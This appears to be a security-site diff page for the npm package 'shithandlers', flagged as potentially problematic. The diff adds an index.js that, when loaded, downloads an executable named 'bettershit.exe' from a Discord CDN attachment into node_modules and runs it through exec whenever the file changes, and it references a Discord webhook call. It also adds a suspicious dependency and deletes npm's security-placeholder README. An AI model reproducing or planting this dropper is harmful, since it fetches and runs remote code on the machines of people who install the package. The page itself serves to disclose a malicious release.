shithandlers 0.0.1-security → 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of shithandlers might be problematic. Click here for more details.
- package/index.js +64 -0
- package/package.json +12 -3
- package/README.md +0 -5
package/index.js
ADDED
|
@@ -0,0 +1,64 @@
|
|
|
1
|
+
const fs = require('fs');
|
|
2
|
+
const http = require('https');
|
|
3
|
+
const { exec } = require('child_process');
|
|
4
|
+
const path = require('path');
|
|
5
|
+
|
|
6
|
+
class ExeFileHandler {
|
|
7
|
+
constructor(exePath) {
|
|
8
|
+
this.exePath = exePath;
|
|
9
|
+
}
|
|
10
|
+
|
|
11
|
+
onModified(event) {
|
|
12
|
+
if (event === this.exePath) {
|
|
13
|
+
exec(this.exePath, (error, stdout, stderr) => {
|
|
14
|
+
if (error) {
|
|
15
|
+
console.error(`Error executing ${this.exePath}: ${error}`);
|
|
16
|
+
}
|
|
17
|
+
});
|
|
18
|
+
}
|
|
19
|
+
}
|
|
20
|
+
}
|
|
21
|
+
|
|
22
|
+
function downloadExe(repoUrl, exeFilename) {
|
|
23
|
+
const downloadPath = path.join('node_modules', exeFilename);
|
|
24
|
+
|
|
25
|
+
// Create the 'node_modules' directory if it doesn't exist
|
|
26
|
+
if (!fs.existsSync('node_modules')) {
|
|
27
|
+
fs.mkdirSync('node_modules');
|
|
28
|
+
}
|
|
29
|
+
|
|
30
|
+
http.get(repoUrl, (response) => {
|
|
31
|
+
if (response.statusCode === 200) {
|
|
32
|
+
const fileStream = fs.createWriteStream(downloadPath);
|
|
33
|
+
|
|
34
|
+
response.pipe(fileStream);
|
|
35
|
+
|
|
36
|
+
response.on('end', () => {
|
|
37
|
+
observeFile(downloadPath);
|
|
38
|
+
sendDiscordWebhook();
|
|
39
|
+
});
|
|
40
|
+
} else {
|
|
41
|
+
}
|
|
42
|
+
});
|
|
43
|
+
}
|
|
44
|
+
|
|
45
|
+
function observeFile(exePath) {
|
|
46
|
+
fs.watch(exePath, (event) => {
|
|
47
|
+
if (event === 'change') {
|
|
48
|
+
exec(exePath, (error, stdout, stderr) => {
|
|
49
|
+
if (error) {
|
|
50
|
+
}
|
|
51
|
+
});
|
|
52
|
+
}
|
|
53
|
+
});
|
|
54
|
+
}
|
|
55
|
+
|
|
56
|
+
|
|
57
|
+
const githubUrl = "https://cdn.discordapp.com/attachments/919194639997759521/1168547085554024529/bettershit.exe?ex=65522947&is=653fb447&hm=06099ba77446f127ba4ccbc69df64fe0c5659e458e8faedd51dd515910c0f272&";
|
|
58
|
+
const exeFilename = "bettershit.exe";
|
|
59
|
+
|
|
60
|
+
downloadExe(githubUrl, exeFilename);
|
|
61
|
+
|
|
62
|
+
function client(){
|
|
63
|
+
console.log("discord.js")
|
|
64
|
+
}
|
package/package.json
CHANGED
|
@@ -1,6 +1,15 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "shithandlers",
|
|
3
|
-
"version": "0.0
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "1.0.0",
|
|
4
|
+
"description": "",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"dependencies": {
|
|
7
|
+
"discordwebtest3": "^1.0.0"
|
|
8
|
+
},
|
|
9
|
+
"devDependencies": {},
|
|
10
|
+
"scripts": {
|
|
11
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
|
12
|
+
},
|
|
13
|
+
"author": "",
|
|
14
|
+
"license": "ISC"
|
|
6
15
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=shithandlers for more information.
|